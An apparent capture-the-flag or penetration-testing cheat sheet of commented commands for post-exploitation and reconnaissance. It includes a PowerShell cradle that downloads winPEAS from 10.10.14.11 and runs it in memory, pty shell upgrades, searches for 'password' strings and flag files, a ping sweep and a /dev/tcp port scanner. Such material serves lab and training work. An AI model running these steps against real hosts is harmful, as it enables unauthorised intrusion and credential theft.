General

  • Find files and strings on Windows (cmd) and Linux

REM Recursive search (/s) of the current directory tree for any file whose name contains "flag"
dir /s *flag*.*
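# Recursive (-r), whole-word (-w) search for a pattern; -n prints line numbers.
# -e takes the PATTERN, not a file, so a pattern starting with '-' is also safe.
grep -rnw -e 'pattern' /path/to/look
# Locate a file by name anywhere on disk; let find do the filtering instead of
# piping the whole tree through grep (no substring false positives such as
# "user.txt.bak" sneaking in via an unanchored match). Permission errors go to /dev/null.
find / -name 'user.txt' 2>/dev/null
# Regular files owned by a given group — useful for spotting what a group you
# belong to (or can become) is allowed to touch.
find / -group admin -type f 2>/dev/null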

# Case-insensitive (-i) recursive (-r) search for the literal word "password" under a folder
grep -r -i -e "password" /path/to/folder
REM Windows equivalent: /i case-insensitive, /n line numbers, /s recurse into subdirectories
findstr /i /n /s "password" *.*

  • Upgrade a limited/non-interactive shell to /bin/bash with a pty

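# Spawn bash inside a pseudo-terminal so tab completion, job control and
# password prompts (su/sudo/ssh) work. Many targets only ship python3 now,
# so try that first and fall back to the legacy "python" binary.
python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
# No python at all: util-linux "script" also allocates a pty.
script -qc /bin/bash /dev/null
# Last resort: interactive bash without a pty (prompt and history, but no
# job control and programs that need a terminal will still misbehave).
/bin/bash -i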
  • Build a custom wordlist from a target website (cewl)

# Spider the page and append every word it finds to words.txt (URL quoted so
# shell metacharacters in a path or query string are not interpreted).
cewl 'http://10.10.110.100:65000/wordpress/index.php/languages-and-frameworks' >>words.txt
  • Download and run a script on Windows when wget/curl are unavailable (PowerShell)

# Fetch the script body over HTTP and hand it straight to Invoke-Expression, so
# it runs in memory without touching disk. Note the transport is plain HTTP:
# whatever the server at 10.10.14.11 returns is executed, so make sure you own
# that listener and the file it serves.
$wc = New-Object System.Net.WebClient
Invoke-Expression $wc.DownloadString('http://10.10.14.11:80/winPEAS.ps1')
  • Ping sweep (host discovery on a /24)

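#linux
# Ping every host in a /24 in parallel and print the ones that answer.
# The original one-liner used `( ping ... | grep ... & )`, which backgrounds the
# pipeline *inside* a throw-away subshell: the outer shell cannot `wait` for it,
# so the prompt returns before the replies arrive and output lands on top of
# whatever you type next. Backgrounding the subshell itself (`( ... ) &`) lets a
# final `wait` collect every probe. -W 1 caps each probe at one second.
#
# Arguments: $1 - first three octets of the network, no trailing dot (default 192.168.1)
# Outputs:   one "bytes from ..." line per responding host
ping_sweep() {
  local net=${1:-192.168.1}
  local host
  # .255 is the /24 broadcast address and never answers a unicast probe
  for host in {1..254}; do
    ( ping -c 1 -W 1 "${net}.${host}" | grep 'bytes from' ) &
  done
  wait
}
# usage: ping_sweep 192.168.1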

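REM windows (cmd.exe). Inside a .bat file write %%a instead of %a.
REM Filter on "TTL=" rather than "Reply": when a host is down Windows prints
REM "Reply from <your-own-ip>: Destination host unreachable", which also
REM contains "Reply" and would list dead hosts as alive. Only real echo replies carry TTL=.
(for /L %a IN (1,1,254) DO ping /n 1 /w 1 172.16.2.%a) | find "TTL="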
  • Port scan without nmap/nc (bash /dev/tcp)

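# TCP connect scan using bash's /dev/tcp pseudo-device (no nmap or nc needed).
# The bare `echo > /dev/tcp/host/port` form has no timeout: a filtered port
# blocks until the kernel's own connect timeout (often well over a minute),
# which stalls the whole 65535-port loop. Each attempt is therefore run under
# `timeout 1`. Host and port are passed as $0/$1 to the inner bash rather than
# interpolated into the -c string, so odd characters in them are not executed.
#
# Arguments: $1 - target host/IP (required)
#            $2 - first port (default 1)
#            $3 - last port  (default 65535)
# Outputs:   "<port> is open" for every port that accepts a connection
tcp_scan() {
  local host=${1:?usage: tcp_scan host [first_port] [last_port]}
  local first=${2:-1}
  local last=${3:-65535}
  local port
  for (( port = first; port <= last; port++ )); do
    if timeout 1 bash -c 'echo > "/dev/tcp/$0/$1"' "$host" "$port" 2>/dev/null; then
      printf '%s is open\n' "$port"
    fi
  done
}
# usage: tcp_scan 192.168.1.1          # all 65535 ports
#        tcp_scan 192.168.1.1 1 1024   # well-known ports only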
  • Network: map listening TCP ports to their owning process (PowerShell)

listening_ports.ps1 (run on the Windows host):
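# List every LISTENING TCP socket together with the image path and name of the
# process that owns it. `netstat -ano` prints the owning PID as the last column.
$nets = netstat -ano | Select-String LISTENING
foreach ($n in $nets) {
    # Collapse runs of spaces and trim the leading indent so Split(' ') yields
    # exactly one entry per column and the PID is reliably the last one.
    $fields = ($n.Line -replace ' +', ' ').Trim().Split(' ')
    $procId = $fields[-1]
    try {
        # Get-Process reports an unknown PID as a NON-terminating error, which
        # try/catch never sees; -ErrorAction Stop turns it into an exception so
        # the "(Process not found)" branch actually runs instead of printing a
        # line with an empty path/name.
        $proc = Get-Process -Id $procId -ErrorAction Stop
        # Anchor the replacement to the end of the line. An unanchored -replace
        # on the bare PID rewrites the FIRST occurrence of those digits, which
        # can be part of the port or address (e.g. PID 135 vs port :135).
        # Path can be blank for system/protected processes you cannot open.
        $n.Line -replace "\s$procId\s*$", " $($proc.Path) $($proc.ProcessName)"
    } catch {
        "$($n.Line) (Process not found)"
    }
}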
